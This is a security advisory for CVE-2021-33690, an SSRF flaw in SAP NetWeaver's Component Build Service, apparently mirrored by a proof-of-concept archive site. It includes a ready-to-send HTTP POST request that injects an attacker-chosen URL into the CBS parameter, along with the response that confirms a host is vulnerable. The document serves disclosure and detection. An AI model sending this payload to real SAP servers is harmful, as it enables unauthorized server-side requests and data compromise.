Associated Vulnerability
Title:SAP NetWeaver 代码问题漏洞 (CVE-2021-33690)Description:SAP NetWeaver Development Infrastructure是德国思爱普(SAP)公司的提供了一致的开发环境,开发团队,并支持软件开发贯穿产品的整个生命周期。 SAP NetWeaver Development Infrastructure 存在代码问题漏洞,该漏洞的存在是由于对用户提供的输入验证不足。
Description
[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure
Readme
# CVE-2021-33690
[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure
```
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955
SAP Approved Fixes: True
Status: analyzed and published
ADVISORY INFORMATION
Title: [CVE-2021-33690] Server-Side Request Forgery Vulnerability in SAP NetWeaver Development Infrastructure
Risk: Critical
Advisory URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Date published: June 1, 2023
VULNERABILITY INFORMATION
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS v3.1 Base Score: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
VULNERABILITY DESCRIPTION
A vulnerability known as Server-Side Request Forgery (SSRF) has been identified in various versions of the
SAP NetWeaver Development Infrastructure Component Build Service, namely 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50.
This weakness within the SAP NetWeaver Development Infrastructure Component Build Service gives an attacker,
who has server access, the ability to execute proxy attacks via specially tailored queries. The aftermath of
such attacks can lead to the complete compromise of sensitive server data, affecting its accessibility.
It’s crucial to note that the severity of this vulnerability is contingent on whether the SAP NetWeaver
Development Infrastructure (NWDI) operates on the intranet or the internet. The CVSS score has been calculated based
on the worst-case situation, which presumes it operates online.
TECHNICAL DESCRIPTION
To determine if the server is vulnerable to SSRF, send the following request:
POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE
If the following response is received, it implies the presence of the vulnerability:
<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>
About RedRays
RedRays is a premier cybersecurity enterprise that safeguards ERP systems against internal fraudulent
activities and external cyber threats. We take pride in delivering robust security solutions for large
corporations and managed service providers that depend on major ERP systems like SAP, Oracle, and Microsoft.
Utilizing advanced tools and strategies, we proactively supervise and control security in extensive
SAP environments globally.
Our primary goal is to bridge the security gap from both a technical and business perspective, ensuring our
clients’ seamless operations and safeguarding their precious data. We at RedRays, are committed to upholding
top-tier security standards while providing extraordinary client service and assistance.
About RedRays R&D
The cornerstone of RedRays’ accomplishments lies in our research and development (R&D) unit, specializes in
studying and analyzing vulnerabilities in essential corporate applications. Our R&D initiatives have earned
acknowledgment and admiration from leading software firms such as SAP, Oracle, Microsoft Dynamics, and IBM.
This dedication to research enables us to anticipate emerging threats and craft bespoke security solutions
that cater to our clients’ needs.
Our team comprises seasoned professionals with diverse skill sets spanning various security domains,
such as vulnerability evaluation, penetration testing, incident management, and threat intelligence.
Our commitment is to perform rigorous research and deliver avant-garde solutions to fortify SAP systems
against ever-changing threats.
```
## Contact RedRays
For any questions or further details, don't hesitate to reach out:
* [GitHub](https://github.com/redrays-io)
* [Email](mailto:vahagn@redrays.io)
* [Website](https://www.redrays.io?gh)
File Snapshot
[4.0K] /data/pocs/bb54d9ba1920c8acc60e73d88dc523cead60a88b
└── [4.2K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.